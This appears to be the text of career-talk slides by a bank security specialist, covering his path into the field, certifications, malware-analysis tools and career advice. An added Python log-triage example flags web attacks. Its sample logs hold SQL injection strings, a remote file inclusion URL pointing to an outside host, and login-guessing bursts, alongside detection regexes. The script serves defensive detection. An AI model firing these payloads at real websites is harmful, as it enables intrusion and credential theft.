Andrew Martin - Information Security Specialist, CIBC
My Career in Information Security
Agenda
My background
Pre-CIBC experience and qualifications
How I got my current job
Qualifications obtained at CIBC
Current responsibilities
Tools
Attacks
Opportunities and how to be successful
Background
Graduated from CTY program in December 2003, before Seneca moved to York
Specialized in security
Left the country in January 2004, missed my convocation and traveled the South Pacific for 7 months
Pre-CIBC experience and qualifications
Worked for a friend's small company
Home / SOHO clients
First exposure to security involved removing viruses like Blaster, MyDoom, securing wireless networks, deploying home firewalls
Got a job for Microsoft's outsourced support company in Sydney, Australia when the Sasser worm hit in April 2004
Contract junior network admin for WSI in 2005
Helped build a small data center
Secured their workstations, wireless access points
Pre-CIBC experience and qualifications
Certifications
A+, Server+, Network+
MCP in Windows 2003 administration
How I got my current job
While working at WSI I noticed a job posting at CIBC for a desktop support analyst
Applied for and got the job
Supported CIBC's trading floor staff including traders, back office staff and some senior executives
Spent 8 months in desktop support
How I got my current job
Noticed a job opening in the security group as an analyst
24/7 support
12 hour rotating shifts
7AM-7PM / 7PM-7AM (terrible!)
Monitor Intrusion Detection System (IDS) and other security devices
Passion for security, enthusiasm and willingness to learn got me the job
Fantastic position to "get your foot in the door"
How I got my current job
Excelled at responsibilities as a shift analyst, moved to a 9-5 day job after 8 months (more responsibility, same pay)
My boss wanted to have someone working every day who could find and investigate attacks
A new position was created for me
Promoted to specialist a few months later
Have been in my current role for a little over a year
Qualifications obtained at CIBC
MCSA – 2003, specialized in security
CCNA
CISSP
SANS:
GCFA Gold (Forensic Analyst) – Mobile Device Forensics
GCIH Gold (Incident Handler) – Exploit Kits Revealed – MPack
GREM (Reverse Engineering Malware)
And my most recent…
Qualifications obtained at CIBC
One of 4 professionals worldwide to obtain the SANS GSE (Security Expert) Malware certification
GCFA, GCIH, GREM were prerequisites; I needed to write two papers to achieve gold status as well. The prereqs took over a year to complete
The testing included:
A telephone interview
150 multiple choice questions
2 days (14 hours) of hands-on lab assignments at the SANS Las Vegas 2008 conference
A written report
CIBC covered my expenses and flew me to Vegas to take it!
Current responsibilities
Mentor and lead a team of 9 analysts
Lead for maintaining CIBC's Intrusion Detection System
Influence direction of CIBC's information security by applying real world attack experience
Research & investigate security threats to CIBC's infrastructure
Reverse engineer malware (viruses) to determine their capability
Find, investigate and (sometimes) take down botnets
Recover sensitive stolen information
Assist corporate security and online fraud investigation groups
Tools
From a high level
Anti virus
Intrusion Detection System
Proxy + Web Filtering
Log correlation engine
Tools
For reverse engineering and malware analysis
Linux
VMware
Wireshark
Perl, strings, file, netcat, hex editor
Encase (Helix or SANS SIFT)
Debugger – OllyDbg
Disassembler – IDA Pro
Mandiant Red Curtain
PEiD
Various unpackers
Memory dumper (LordPE)
Sysinternals tools – Process Explorer, Process Monitor
Etc, etc
Tools
Bar none, the MOST important tools for conducting investigations are your "detective hat" and patience
You must always answer these questions
When was the system attacked?
Who attacked the system? (IP address)
How was it compromised?
What was the purpose or payload of the attack?
Attacks
Trends
Client side attacks – Workstations are compromised via malicious websites, typically via ActiveX controls
Server side attacks – Websites are compromised in the tens of thousands by SQL injection, remote file inclusion and stolen or weak passwords
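The server-side trends on this slide and the four investigation questions from the Tools slide (when, who, how, payload) can be worked end to end against web-server logs. The Python below is an added example for this transcript, not the speaker's or CIBC's tooling: it parses constructed Apache combined-format log lines, flags SQL injection and remote file inclusion indicators in the URL-decoded query string, counts bursts of failed logins as the stolen/weak password case, and reports when, who (IP), how and payload for each hit. The sample log, the indicator regexes and the threshold of 5 failed logins are illustrative assumptions.

```python
"""Triage constructed web-server access-log lines for the server-side
attack patterns on the slide (SQL injection, remote file inclusion,
password guessing) and answer, per hit, the four investigation
questions: when, who (IP), how, and what the payload was.

Added example for this transcript; the log lines are constructed and
the indicator lists are illustrative, not real detection content.
"""
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" format:
# ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [14/Mar/2008:10:02:11 -0500] "GET /news.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [14/Mar/2008:10:03:40 -0500] "GET /news.php?id=42%27%20OR%201%3D1-- HTTP/1.1" 200 9800 "-" "Mozilla/4.0"
203.0.113.5 - - [14/Mar/2008:10:03:52 -0500] "GET /news.php?id=42%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 500 312 "-" "Mozilla/4.0"
198.51.100.7 - - [14/Mar/2008:10:05:01 -0500] "GET /index.php?page=http://198.51.100.7/inc.txt HTTP/1.1" 200 77 "-" "libwww-perl/5.805"
198.51.100.9 - - [14/Mar/2008:10:06:00 -0500] "POST /admin/login HTTP/1.1" 401 0 "-" "curl/7.18"
198.51.100.9 - - [14/Mar/2008:10:06:01 -0500] "POST /admin/login HTTP/1.1" 401 0 "-" "curl/7.18"
198.51.100.9 - - [14/Mar/2008:10:06:02 -0500] "POST /admin/login HTTP/1.1" 401 0 "-" "curl/7.18"
198.51.100.9 - - [14/Mar/2008:10:06:03 -0500] "POST /admin/login HTTP/1.1" 401 0 "-" "curl/7.18"
198.51.100.9 - - [14/Mar/2008:10:06:04 -0500] "POST /admin/login HTTP/1.1" 401 0 "-" "curl/7.18"
198.51.100.9 - - [14/Mar/2008:10:06:09 -0500] "POST /admin/login HTTP/1.1" 302 0 "-" "curl/7.18"
"""

# Illustrative indicators (assumed, not a complete signature set); applied to
# the decoded query string so %27 / %20 encoding does not hide them.
SQLI_RE = re.compile(r"('\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select|--\s*$|;\s*drop\s)", re.I)
RFI_RE = re.compile(r"=\s*(https?|ftp)://", re.I)
FAILED_LOGIN_THRESHOLD = 5  # 401 responses from one IP against a login path


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["query"] = unquote_plus(urlsplit(rec["path"]).query)
    return rec


def classify_request(rec):
    """Label one parsed request 'sqli', 'rfi' or None based on its decoded query."""
    q = rec["query"]
    if SQLI_RE.search(q):
        return "sqli"
    if RFI_RE.search(q):
        return "rfi"
    return None


def triage(log_text):
    """Answer when / who / how / payload for each suspicious event in the log."""
    findings = []
    failed_logins = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        how = classify_request(rec)
        if how:
            findings.append({"when": rec["when"].isoformat(), "who": rec["ip"],
                             "how": how, "payload": rec["query"]})
        # Password guessing: count 401s per IP on a login path; report once at the threshold.
        if rec["status"] == 401 and "login" in rec["path"]:
            failed_logins[rec["ip"]] += 1
            if failed_logins[rec["ip"]] == FAILED_LOGIN_THRESHOLD:
                findings.append({"when": rec["when"].isoformat(), "who": rec["ip"],
                                 "how": "password-guessing",
                                 "payload": "%d failed logins to %s" % (FAILED_LOGIN_THRESHOLD, rec["path"])})
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print("%s  %-15s %-18s %s" % (hit["when"], hit["who"], hit["how"], hit["payload"]))
```

Running it lists two SQL injection attempts from one address, one remote file inclusion attempt, and one password-guessing burst, each with its timestamp, source IP, category and decoded payload; the 302 after five 401s is the kind of follow-up a real investigation would then pull the application logs for.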
Opportunities and how to be successful
To excel in security (technically) you should be at least competent in virtually every area of IT
Windows administration ***
Unix/Linux administration ***
Networking / firewall
Development (scripting, programming)
Databases / SQL
Hardware
Opportunities and how to be successful
From Tech Republic's 2008 salary report (US), Top 30 job functions: Security Specialist ranks 8th with avg salary of 85K
No I don't make that much sadly
#1 - Executive Management (CEO SVP VP) $104,767
#2 - System Architect $100,734
#7 - Database Manager $87,261
#8 - Computer Security Specialist $85,699
#22 - Network Analyst $64,217
#30 - Help Desk Support $48,783
Opportunities and how to be successful
Information Security is a hot field, but hard to break into
Hackers won't stop hacking, they will only hack more.
There is lots of money being made by bad guys
Two paths to take
1 – Work for a "Client" ex: CIBC
2 – Work for a "Vendor" ex: Symantec
Look for jobs with a company that is governed by regulations. These regulations will stipulate that they must have dedicated security staff and resources
Banks, insurance companies, health care providers, government
Take a job to "get your foot in the door"
Opportunities and how to be successful
"Soft" skills are incredibly valuable
Enthusiasm
Willingness to learn
Public speaking
Ability to admit mistakes
Ability to work in a team
Without strong soft skills your career will be severely limited
The most successful people are good at many things
Questions?